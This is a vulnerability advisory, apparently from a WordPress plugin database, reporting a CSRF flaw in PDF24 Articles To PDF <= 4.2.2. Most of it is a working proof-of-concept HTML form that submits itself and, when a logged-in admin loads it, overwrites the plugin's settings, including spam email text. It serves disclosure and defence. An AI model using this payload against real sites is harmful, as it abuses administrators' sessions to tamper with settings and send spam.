WordPress Plugin Vulnerabilities
PDF24 Articles To PDF <= 4.2.2 - Arbitrary Settings Update via CSRF
Description
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
Proof of Concept
<form id="test" action="https://example.com/wp-admin/options-general.php?page=pdf24" method="POST">
<input type="text" name="language" value="en">
<input type="text" name="availability" value="public">
<input type="text" name="contentCompression" value="on">
<input type="text" name="docOptionsInUse" value="on">
<input type="text" name="docHeader" value="hacked">
<input type="text" name="docSize" value="A4">
<input type="text" name="docOrientation" value="portrait">
<input type="text" name="docStyle" value="">
<input type="text" name="docDefaultFilename" value="">
<input type="text" name="docHomeFilename" value="">
<input type="text" name="docSingleFilename" value="">
<input type="text" name="docPageFilename" value="">
<input type="text" name="docCategoryFilename" value="">
<input type="text" name="docSearchFilename" value="">
<input type="text" name="emailOptionsInUse" value="on">
<input type="text" name="emailType" value="text/plain">
<input type="text" name="emailSubject" value="hacked">
<input type="text" name="emailFrom" value="hacked">
<input type="text" name="emailText" value="please buy my rolex">
<input type="text" name="cpInUse" value="on">
<input type="text" name="cpDisplayMode" value="bottom">
<input type="text" name="cpStyle" value="default_elbf">
<textarea name="cpCustomStyle">.pdf24Plugin-cp {
border:1px solid silver;
}
.pdf24Plugin-cp input[type="text"] {
width:200px;
border:1px solid silver;
margin:0;
padding:2px;
}
.pdf24Plugin-cp input[type="submit"] {
margin:0;
padding:2px 10px !important;
}
.pdf24Plugin-cp form {
margin:0;
padding:0;
}
.pdf24Plugin-cp img {
height:32px;
}
.pdf24Plugin-cp span, .pdf24Plugin-cp input, .pdf24Plugin-cp img {
vertical-align:middle;
}
.pdf24Plugin-cp * {
font-size:90%;
}</textarea>
<input type="text" name="sbpInUse" value="on">
<input type="text" name="sbpStyle" value="default_dsbfl">
<textarea name="sbpCustomStyle">.pdf24Plugin-sbp {
text-align:center;
border: 1px solid silver;
padding: 5px;
}
.pdf24Plugin-sbp-link a {
font-weight:bold;
}
.pdf24Plugin-sbp-bl {
font-size:smaller;
}</textarea>
<input type="text" name="tbpStyle" value="default_dflb">
<textarea name="tbpCustomStyle">.pdf24Plugin-tbp {
padding: 3px;
width:600px;
margin:auto;
}
.pdf24Plugin-tbp * {
font-size: 90%;
}</textarea>
<input type="text" name="lpStyle" value="default_dfl">
<textarea name="lpCustomStyle">.pdf24Plugin-lp-link a {
}</textarea>
<input type="text" name="lang-enterEmail" value="Enter email address">
<input type="text" name="lang-send" value="Send">
<input type="text" name="lang-sendArticleAsPDF" value="Send article as PDF">
<input type="text" name="lang-sendArticlesAsPDF" value="Send articles as PDF">
<input type="text" name="lang-downloadArticleAsPDF" value="Download article as PDF">
<input type="text" name="lang-downloadArticlesAsPDF" value="Download articles as PDF">
<input type="text" name="lang-createPDF" value="Create PDF">
<textarea name="docTpl"><html>
<head>
<base href="{baseUrl}" />
<title>{headline}</title>
<meta http-equiv="content-type" content="text/html; charset={charset}" />
<style type="text/css">
{css}
</style>
</head>
<body>
<h1><a href="{headlineUrl}">{headline}</a></h1>
<div>{content}</div>
</body>
</html></textarea>
<textarea name="docEntryTpl"><div class="bodyPart">
<h2><a href="{url}">{title}</a></h2>
<div class="meta">{dateTime} {author}</div>
<div class="text">{text}</div>
</div></textarea>
<input type="text" name="update" value="Save Changes">
</form>
<script>
document.getElementById("test").submit();
</script> Affects Plugins
No known fix - plugin closed
References
Classification
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
Timeline
Publicly Published
2022-05-30 (about 2 months ago)
Added
2022-05-30 (about 2 months ago)
Last Updated
2022-05-30 (about 2 months ago)